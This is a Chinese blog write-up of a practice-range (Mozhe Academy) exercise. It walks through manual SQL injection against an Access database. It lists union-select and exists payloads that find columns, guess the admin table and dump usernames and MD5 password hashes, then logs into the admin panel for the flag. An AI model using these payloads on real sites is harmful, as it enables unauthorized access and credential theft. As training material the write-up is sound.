墨者学院;sql手工注入;access;在线靶场

本文详细介绍了如何利用Access数据库的注入漏洞进行一系列操作,包括注册、获取端口号和地址、探测字段和表名、尝试admin表的存在、枚举字段以及爆破用户账户和密码。通过MD5解码,成功登录用户管理后台。

1、注册账号,启动环境;购买墨币;

2、 得到端口号和地址;

 3、进入靶场;

 

4、输入' 成功闭合报错,有注入漏洞;

 

5、access数据库没有库名,都是表名;

order by 4

判断出四个字段

6、枚举关键表名:正常则存在admin表;通常access数据库都有admin表;

and exists(select count(*) from admin)

7、 查找回显字段

union select 1,2,3,4 from admin

8、 枚举字段:正常则页面不报错;通常access表会存在以下三个字段;

id,username,passwd

and exists(select id from admin) 

 and exists(select username from admin)

 

and exists(select password from admin)

这里枚举失败,翻车;

 

and exists(select passwd from admin)

9、爆一下用户账户和密码;

union select 1,username,passwd,4 from admin 

md5 解码一下;

MD5编码是由数字与字母组成,因此看到位数以及字母组成形式的字符可以迅速判断可能是MD5编码。

 

10、这里登陆一下

mozhe

27737201

 

 

 

okok

恭喜你 moke 成功登录用户管理后台,KEY: mozhee7cc35d6a83a8978b4a44f56f6d

 

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值